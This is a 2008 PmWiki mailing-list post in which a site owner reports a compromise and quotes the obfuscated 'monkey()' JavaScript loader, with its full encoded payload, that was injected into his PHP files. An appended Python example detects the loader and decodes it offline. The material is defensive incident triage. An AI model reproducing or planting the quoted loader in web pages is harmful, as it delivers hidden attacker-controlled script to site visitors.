[pmwiki-users] monkey() function?!?

Peter & Melodye Bowers pbowers at pobox.com
Sun Jan 6 17:56:48 CST 2008


I went away on vacation for a week and when I returned I found my wiki site
non-functioning and the following code inserted in several key pmwiki php
files (pmwiki.php, wikiforms.php, extendedmarkup.php, some of my triad skin
php files, etc.):

</head>\n<body><script language = "javascript">function monkey(s){
var s1=unescape(s.substr(0,s.length)); var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)+7);
document.write(unescape(t));
};
monkey('%35%4C%5C%6B%62%69%6D%19%45%5A%67%60%6E%5A%60%5E%36%20%43%5A%6F%5A%6
C%5C%6B%62%69%6D%20%37%5D%68%5C%6E%66%5E%67%6D%27%70%6B%62%6D%5E%21%6E%67%5E
%6C%5C%5A%69%5E%21%20%1E%2C%3C%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%
1E%2F%2E%1E%2B%29%1E%30%2C%1E%30%2B%1E%2F%2C%1E%2C%3D%1E%2B%2B%1E%2F%31%1E%3
0%2D%1E%30%2D%1E%30%29%1E%2C%3A%1E%2B%3F%1E%2B%3F%1E%2D%32%1E%2C%2D%1E%2D%3C
%1E%2D%3C%1E%2F%2D%1E%2B%3E%1E%2F%2D%1E%2D%2A%1E%2F%30%1E%2D%3F%1E%2E%2D%1E%
2F%31%1E%2B%3E%1E%2F%32%1E%2D%3E%1E%2B%3F%1E%2B%2B%1E%2B%29%1E%30%30%1E%2F%3
2%1E%2F%2D%1E%30%2D%1E%2F%31%1E%2C%3D%1E%2C%29%1E%2B%29%1E%2F%31%1E%2F%2E%1E
%2F%32%1E%2F%30%1E%2F%31%1E%30%2D%1E%2C%3D%1E%2C%29%1E%2C%3E%1E%2C%3C%1E%2B%
3F%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2C%3E%20%22%22%3
4%35%28%6C%5C%6B%62%69%6D%37'); </script>";

My first guess is that my hosting company was infiltrated by some sort of
virus that went on the prowl for anything remotely resembling HTML and
inserted this code in hopes it would work (it didn't - it just generated php
errors in every case where I found it).  But I just want to check before I
start pointing fingers at my host (who generously donates the hosting and so
I like to stay on their good side) that there's not something I might have
done through PHP that would have opened a door to allow someone to make this
type of malicious modification?  For instance, webadmin allows users to
bypass any kind of FTP security - I've kept that password secure [obviously]
and now disabled that capability, but I'm just wondering if there's not
something else that a newbie to this kind of thing might have done
accidentally.  Any thoughts from you security gurus out there?  Or do I just
need to contact my host and let him know he's been compromised?

 

-Peter
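An added example for anyone triaging the same kind of infection; it is not code from Peter's post and not part of PmWiki. It scans file contents for the loader's signatures and reverses the loader's transformation offline (unescape, add 7 to each character code, unescape again), so you can see what the injected script would have written into the page without executing it. The infected PHP file below is a constructed sample carrying a benign payload; only the shape of the loader is taken from the post, and the pattern names and helper functions are my own.

```python
"""Detect the injected monkey() loader and reverse its obfuscation offline.

Added example, not code from the pmwiki-users post or from PmWiki. The
infected-file sample below is constructed; the only thing taken from the
post is the loader's transformation (unescape, +7 per char code, unescape).
"""
import re
from urllib.parse import quote, unquote

SHIFT = 7  # constant the loader adds to every char code before its second unescape()

# Signatures of the loader. The second pattern matches the decoding loop itself,
# so a copy in which the attacker renamed monkey() is still flagged.
INJECTION_PATTERNS = [
    re.compile(r"function\s+monkey\s*\("),
    re.compile(r"String\.fromCharCode\(\s*\w+\.charCodeAt\(\s*\w+\s*\)\s*\+\s*\d+\s*\)"),
    re.compile(r"document\.write\(unescape\("),
]


def find_injections(text: str) -> list:
    """Return (line number, pattern) for every line of `text` that trips a signature."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pat in INJECTION_PATTERNS:
            if pat.search(line):
                hits.append((lineno, pat.pattern))
    return hits


def decode_monkey(payload: str, shift: int = SHIFT) -> str:
    """Do offline what monkey(s) does in the browser, minus the document.write():
    unescape, add `shift` to each char code, unescape again. urllib's unquote
    covers the %XX escapes these payloads use (JS unescape also knows %uXXXX)."""
    stage1 = unquote(payload)
    shifted = "".join(chr(ord(c) + shift) for c in stage1)
    return unquote(shifted)


def encode_monkey(html: str, shift: int = SHIFT) -> str:
    """Inverse of decode_monkey(); used here only to build a harmless test payload."""
    escaped = quote(html, safe="")
    shifted = "".join(chr(ord(c) - shift) for c in escaped)
    return quote(shifted, safe="")


def extract_loader(text: str):
    """Pull the shift constant and the encoded argument out of an injected loader,
    or return None when `text` contains no loader."""
    shift = re.search(r"charCodeAt\(\s*\w+\s*\)\s*\+\s*(\d+)", text)
    arg = re.search(r"monkey\('([^']*)'\)", text)
    if shift is None or arg is None:
        return None
    return int(shift.group(1)), arg.group(1)


def recover_payload(text: str):
    """Return the markup the loader in `text` would document.write(), without running it."""
    found = extract_loader(text)
    if found is None:
        return None
    shift, encoded = found
    return decode_monkey(encoded, shift)


# Constructed sample: an ordinary PHP file with the loader appended after the
# closing tag, carrying a benign payload instead of the one from the post.
HARMLESS_PAYLOAD = "<b>constructed test content</b>"
SAMPLE_INFECTED_PHP = (
    "<?php\n"
    "// constructed sample file, not a real PmWiki source file\n"
    "echo 'hello';\n"
    "?>\n"
    '</head>\\n<body><script language = "javascript">function monkey(s){\n'
    "var s1=unescape(s.substr(0,s.length)); var t='';\n"
    "for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)+7);\n"
    "document.write(unescape(t));\n"
    "};\n"
    f"monkey('{encode_monkey(HARMLESS_PAYLOAD)}'); </script>\n"
)

if __name__ == "__main__":
    for lineno, pattern in find_injections(SAMPLE_INFECTED_PHP):
        print(f"line {lineno}: matched {pattern}")
    print("loader would write:", recover_payload(SAMPLE_INFECTED_PHP))
```

Run `find_injections()` over every PHP and skin file the host serves (reading each file into `text`) to get a complete list of touched files rather than the ones that happened to throw errors; `recover_payload()` on a real infected file yields the markup the browser would have received, which is the useful indicator to hand to the host. Matching the decoding loop rather than the function name is deliberate: the name is trivial to change, the loop is what the obfuscation needs.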



-------------- next part --------------
An HTML attachment was scrubbed...
URL: /pipermail/pmwiki-users/attachments/20080107/f9b95232/attachment.html 

